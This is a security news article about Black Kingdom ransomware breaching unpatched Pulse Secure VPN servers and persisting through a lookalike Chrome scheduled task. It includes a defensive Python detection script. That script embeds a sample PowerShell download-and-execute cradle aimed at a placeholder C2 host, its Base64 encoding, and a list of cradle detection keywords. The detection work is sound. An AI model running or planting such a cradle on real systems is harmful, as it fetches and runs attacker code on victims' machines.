Operators of the Black Kingdom ransomware are targeting companies running unpatched Pulse Secure VPN software, according to security researchers.
The malware was caught in a honeypot, allowing researchers to analyze and document the tactics used by the threat actors.
They take advantage of CVE-2019-11510, a critical vulnerability affecting older versions of Pulse Secure VPN that was patched in April 2019. Companies have delayed updating their software even after exploits were published and the US government warned that threat actors were exploiting the flaw, and some organizations continue to run a vulnerable version of the product.
REDTEAM.PL, a Poland-based cybersecurity company, noted that the Black Kingdom operators used the same entry point, the Pulse Secure VPN flaw, to breach what they believed was a target.
From the researchers' observations, the ransomware established persistence through a scheduled task masquerading as a legitimate Google Chrome task, with only one letter setting the names apart.
According to REDTEAM.PL's analysis, the scheduled task executes a Base64-encoded command in a hidden PowerShell window to fetch a script named "reverse.ps1", which is most likely used to open a reverse shell on the compromised host.
Adam Ziaja from REDTEAM.PL said the script could not be recovered from the attacker-controlled remote server, probably because the server hosting it was blocked before the payload was delivered.
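The two persistence indicators described above, a lookalike scheduled task name and a Base64-encoded PowerShell command run in a hidden window, can be checked for in a scheduled-task inventory. The script below is an added detection example written for this article; it is not REDTEAM.PL's code or part of their report. It assumes that the two Google Update task names serve as the baseline of legitimate names (build your own baseline from a known-clean host), and the task inventory and payload it scans are constructed samples that point at a placeholder `.invalid` host.

```python
import base64
import re

# Reference set of legitimate scheduled task names to compare against. These
# are the Google Update task names commonly present on Windows hosts with
# Chrome installed (assumed baseline; build your own from a known-clean host).
KNOWN_TASK_NAMES = (
    "GoogleUpdateTaskMachineCore",
    "GoogleUpdateTaskMachineUA",
)

# Substrings that indicate a download-and-execute cradle once the encoded
# command has been decoded.
CRADLE_PATTERNS = (
    r"DownloadString", r"DownloadFile", r"Invoke-WebRequest", r"\biwr\b",
    r"Invoke-Expression", r"\bIEX\b", r"Net\.WebClient", r"\.ps1\b",
)

# Constructed sample payload of the kind the article describes; the host is a
# placeholder (.invalid never resolves).
CONSTRUCTED_SCRIPT = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://c2.example.invalid/reverse.ps1')"
)


def encode_powershell(script):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample inventory of (task name, action command line). The first
# entry mimics the lookalike task: one character differs from the real name.
SAMPLE_TASKS = (
    ("GoogleUpdateTaskMachineC0re",
     "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
     + encode_powershell(CONSTRUCTED_SCRIPT)),
    ("GoogleUpdateTaskMachineUA",
     r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler'),
)


def edit_distance(a, b):
    """Levenshtein distance via the standard dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = re.search(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_task(name, cmdline):
    """Return findings for one scheduled task; an empty list means nothing suspicious."""
    findings = []
    # Name one edit away from a known legitimate task, but not identical to it.
    for known in KNOWN_TASK_NAMES:
        if name != known and edit_distance(name, known) == 1:
            findings.append(f"lookalike of legitimate task {known}")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.IGNORECASE):
        findings.append("hidden PowerShell window")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("base64-encoded command")
        for pat in CRADLE_PATTERNS:
            m = re.search(pat, decoded, re.IGNORECASE)
            if m:
                findings.append(f"download/execute indicator in decoded payload: {m.group(0)}")
    return findings


def scan(tasks):
    """Map each task name to its findings, keeping only tasks that have any."""
    return {name: f for name, cmd in tasks if (f := analyze_task(name, cmd))}


if __name__ == "__main__":
    for name, findings in scan(SAMPLE_TASKS).items():
        print(name)
        for f in findings:
            print("  -", f)
```

Decoding the payload before matching matters: the cradle keywords never appear in the raw command line, so a rule that only inspects the visible string misses exactly the case the researchers observed. The edit-distance check is deliberately strict (distance of exactly one) to avoid flagging the legitimate task names themselves.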
The IP address hosting "reverse.ps1" is 220.127.116.11, which belongs to Choopa, a subsidiary of Vultr known for the cheap virtual private servers (VPS) it provides. Such servers are also used by cybercriminals to host their malicious tools.
Black Kingdom ransomware was first spotted in late February by security researcher GrujaRS, who found that it appended the .DEMON extension to encrypted files.
The analyzed sample communicated with the same IP address found in REDTEAM.PL's report. The ransom note below demanded that $10,000 be deposited into a bitcoin wallet and threatened that failure to pay would result in the data being destroyed or sold.